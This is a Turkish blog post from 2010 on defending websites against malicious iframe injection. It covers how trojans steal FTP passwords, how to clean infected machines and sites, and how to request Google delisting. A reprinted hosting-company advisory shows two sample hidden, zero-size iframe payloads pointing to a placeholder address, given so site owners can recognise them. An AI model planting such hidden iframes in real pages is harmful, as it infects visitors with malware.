Blog Arşivi

Duyuru


23 Mart 2010

Web Sitenizi Iframe kodlardan Koruyun

Dünyada milyonlarca web sitesi var ve aradığımız bilgiler nedeniyle bu sitelere bağlanıyoruz. Sitelere bağlanırken bizleri bekleyen en büyük tehlike trojanlardır.

Trojan Nedir?
Trojanlar bulaştığı bilgisayar üzerinde yapılan bütün işlemleri bizler farkına varmadan bilinmeyen kişilere aktaran ve çeşitli şekilde tasarlanmış zararlı yazılımlardır.


Bilgisayara Nasıl Bulaşır?
Genel olarak Web siteleri vasıtası ile bilgisayarlara bulaşmaktadır. Ayrıca tanımadığınız kişilerden gelen e-posta mesajlarını açtığınızda veya mesaj içinde bulunan link ve resimlere tıklandığında, yasal olmayan yollardan çeşitli programları paylaşan sitelerden indirdiğimiz programlardan, çeşitli dosya paylaşım programları ile bilgisayarımıza indirdiğimiz müzik ve filimler vs. yoluyla da bilgisayarlara bulaşmaktadır.

Web Sitelerine Nasıl Bulaşır?

Bilgisayarınıza trojan bulaşmış ile bu zararlı yazılım büyük olasılıkla web sitenize de bulaşacaktır. Site dosyalarını kontrol ettiğinizde kodlar arasında <Iframe ….> gibi başlayan kodlar bulunuyorsa ve antivirüs programınız uyarı vermiyorsa sitenizde sorun var demektir.

Aşağıdaki resimde adı yazılı siteye bağlandığınızda, tarayıcınız bu resimdeki gibi uyarı sayfası  görünmüyorsa bilgisayarınıza zararlı bir yazılım eklenmiştir.(Ekleme tarihi: 13.11.09)


Çünkü iyi ve güncel bir antivirüs programının uyarı vermesi gerekir. Geçenlerde içinde zararlı iframe kodlar bulunan php uzantılı bir dosyayı deneme amaçlı olarak siteme yüklemek istediğimde kullandığım antivirüs (Kaspersky) uyarı vererek dosyayı sildi. (Lütfen denemeyin)

Çeşitli işlemler nedeniyle FTP yoluyla web sitenize bağlandığınızda siz farkına varmadan trojan web sitenizde bulunan klasörlerdeki dosyalarda yer almaya başlayacak ve sitenize bağlanan misafirleriniz de farkında olmadan bu trojanı bilgisayarlarına bulaştırarak yayılmaya devam edecektir.

Bilgisayardan Nasıl Temizlerim?

İyi bir antivirüs programı (Tavsiyen Kaspersky) ve çeşitli antitrojan programları ile bilgisayarınızı temizleyip koruma altına alabilirsiniz. (En iyi temizlik yöntemi bilgisayarı güvenli kipte başlatıp veya Flash Disk benzeri araçlara kurduğunuz antivirüs programı ile bilgisayarı harici ile temizleme yöntemi etkili olacaktır.)

Web Sitesinde Nasıl Temizlerim?
Öncelikle bilgisayarınızda iyi bir temizlik yapmanızda fayda var. Çünkü Trojan büyük olasılıkla bilgisayarınızda sitenize bulaşmış olabilir. Daha sonra sitenizde bulunan bütün dosya ve klasörleri bilgisayarınıza indirerek antivirüs ile taramaya başlayın ve trojan bulaşmış dosyaları tespit ederek bir yere not alınız.

Temizlik işlemi bittiğinde trojan bulunan dosyalar muhtemelen antivirüs programı ile silinmiş olacaktır. Bu dosyaları FTP ile sitenize bağlanıp buradan da silmeniz gerekir.

Zararlı yazılımlar bulunan dosyaları sitenizden sildikten sonra bunların yerlerine orijinal dosyaları yüklediğinizde siteniz normal yayınına devam ederek zararlı yazılımlardan kurtulmuş olacaktır.

Not: Joomla 1.5.x sürümü kullananlar için temizlik sonrası Site Bekçisi eklentisini tavsiye edebilirim.

Bütün İşlemleri Yaptım Ancak Sitemde Yine Trojan Var.

Yapılan bu işlemlere rağmen sitenize tekrar zararlı yazılım bulunduğunu tespit ederseniz son güncellemeyi yapmamış antivirüsler tarafından algılanmayan bir yazılım olabilir veya hizmet aldığınız sunucu kanalı ile sitenize bulaşmış olabilir. Bu hususta hizmet aldığınız hosting firmanızdan destek almanızda fayda bulunmaktadır.

Korunma Önlemleri

Bilgisayarınızda devamlı güncellenen iyi bir antivirüs programı bulundurun. Ayrıca ek güvenlik olarak Antitrojan, Ad-Aware, W.Defender gibi yazılımlar kullanmanızı tavsiye edebilirim. (Geniş kaynak için lütfen Google’de araştırma yapın)
===============

IFRAME Virüsü hakkında önemli duyuru!

(Bu makale Markum.net tarafından hazırlanıp müşterilerine bilgilendirme amacıyla gönderilmiştir.)

IFRAME Virüsü nedir?
Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

Nasıl bulaşır :
1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:
<IFRAME src=’http://siteadresi/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo “<IFRAME src=\”http://siteadresi\123″ width=1 height=1 style=\”visibility:hidden;position:absolute\”></IFRAME>”;

Korunmak için yapmanız gerekenler:
1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.

Sitelerinizi kontrol ediniz:
Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.
Zararlı kod bulaşmış dosyalarınızı temizleyiniz.

IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.

Siteniz Google’da saldırgan site olarak listeleniyorsa:
IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
3. Sitenizi ekleyerek doğrulayınız.
4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …
6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

========

Hiç yorum yok:

Yorum Gönder

Kişi ve kurumları hedef alacak yorumlar ile siyasi ve ideolojik yorumlar yapmayın lütfen.